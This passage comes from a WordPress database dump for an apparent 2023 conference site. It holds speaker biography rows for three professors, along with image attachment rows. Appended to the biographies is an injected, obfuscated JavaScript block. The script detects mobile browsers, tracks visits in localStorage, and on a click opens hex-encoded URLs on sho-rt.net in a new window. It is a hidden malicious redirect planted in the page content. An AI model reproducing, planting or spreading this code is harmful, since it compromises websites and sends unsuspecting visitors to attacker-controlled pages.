_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Nashwa El-Bendary','','publish','closed','closed','','prof-nashwa-el-bendary','','','2023-04-02 07:01:35','2023-04-02 07:01:35','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4024',0,'dt_team','',0),
(4025,1,'2023-04-02 06:59:10','2023-04-02 06:59:10','','dr nashwa','','inherit','open','closed','','dr-nashwa','','','2023-04-02 06:59:10','2023-04-02 06:59:10','',4024,'https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa.jpg',0,'attachment','image/jpeg',0),
(4026,1,'2023-04-02 07:01:03','2023-04-02 07:01:03','','dr nashwa','','inherit','open','closed','','dr-nashwa-2','','','2023-04-02 07:01:03','2023-04-02 07:01:03','',4024,'https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg',0,'attachment','image/jpeg',0),
(4027,1,'2023-04-02 07:06:24','2023-04-02 07:06:24','<!-- wp:paragraph -->\n<p><strong>Osama M. Shalabiea<br>Professor of Astrophysics and Space physics<br>Cairo University- Egypt<br>Dean of the Faculty of Navigation Science and Space<br>Technology (NSST), Beni-Suef University, Egypt</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Member of the Supreme Council of the Arab Union for Astronomy and Space<br>Science of the League of Arab State,<br>and representative of the Arab Republic of Egypt.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>Member of the National Committee for Astronomy and Space Science Academy of<br>Scientific Research and Technology (ASRT)-Egypt</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Member of the International Committee for Astrophysics Laboratory of the<br>International Astronomical Union (IAU)</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Director of Space Science Center, Cairo University.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Former Head of the Department of Astronomy, Space Science and Meteorology,<br>Faculty of Science, Cairo University.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Recipient of the French State Medal.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Member of the Council for Space Research and Remote Sensing- ASRT.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Member of the International Astronomical Union (IAU)</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>PhD from Laboratory Astrophysics - University of Leiden, The Netherland.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Visiting Professor at Nagoya University, Hokkaido University Japan.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Postdoc Researcher at Physics Dept. Ohio State University, USA</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Osama M. Shalabiea','','publish','closed','closed','','prof-osama-m-shalabiea','','','2023-04-02 07:06:27','2023-04-02 07:06:27','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4027',0,'dt_team','',0),
(4028,1,'2023-04-02 07:06:17','2023-04-02 07:06:17','','dr ossama','','inherit','open','closed','','dr-ossama','','','2023-04-02 07:06:17','2023-04-02 07:06:17','',4027,'https://gsw2023.com/wp-content/uploads/2023/04/dr-ossama.jpg',0,'attachment','image/jpeg',0),
(4029,1,'2023-04-02 07:08:58','2023-04-02 07:08:58','<!-- wp:paragraph -->\n<p>Sherif Sedky was born in Cairo (Egypt) in December 1969. He has over 30 years of regional and<br>international experience in international institutions in the Middle East, Europe and the United<br>States, where he worked at the University of California Berkeley (USA), Stanford University<br>(USA), the Catholic University of Leuven (Belgium), the American University in Cairo (Egypt),<br>Zewail City of Science and Technology (Egypt), the University of Sharjah (UAE), Newgiza<br>University (Egypt) and The Egyptian Space Agency. Dr. Sedky published over 100 international<br>referred journal and conference articles, holds 19 patents in the design and fabrication of<br>miniaturized sensors and inertial systems, authored a book, and his H-index is 26 according to<br>google scholar. He served on top senior executive management positions over the past 11 years<br>where he dealt with a large body of multi-national faculty, students and staff.<br>Dr. Sedky built a state-of-the-art research facility that included the first clean room in Egypt and<br>the region, which enabled building a solid microfabrication foundation in Egypt in advanced<br>technologies.<br>Dr. Sedky was selected by late Nobel Laureate Dr. Ahmed Zewail to serve as the Founding Provost<br>and Executive President of Zewail City, Egypt’s National Project for Scientific Renaissance where<br>he was managing all academic, financial and scientific affairs. Dr. Sedky managed to build a<br>scientific edifice composed of a world-class university and research institutes that cope with the<br>latest developments in sciences and technology and capable of addressing the major global<br>challenges which include, but are not limited to, epidemic diseases, renewable energy, water,<br>space technology and environment.<br>In August 2023, President Sisi issued a presidential decree for appointing Dr Sedky as the Chief<br>Executive Officer of the Egyptian Space Agency, where he is currently occupying this post.<br>Dr. Sedky is a recipient of the Abdul Hameed Shoman Prize in 2014, and the 2007 Excellence in<br>research and creative endeavors award offered by The American University in Cairo. He is also a<br>recipient of the Egyptian state merit award in advanced technological sciences in 2002, and the<br>graduate studies award from Cairo University in 1996.<br>Dr. Sedky served on several high-level national committees for the establishment of educational<br>and research Institutes in Egypt. He also served on the scientific committees of several<br>international conferences, the board of the Science and Technology Development Fund (Egypt),<br>the board of the National Center of Electronics Research, the board of King Salman International<br>University and the board of the National Authority for Remote Sensing.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Sherif Sedky','','publish','closed','closed','','prof-sherif-sedky','','','2023-04-02 07:09:01','2023-04-02 07:09:01','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4029',0,'dt_team','',0),
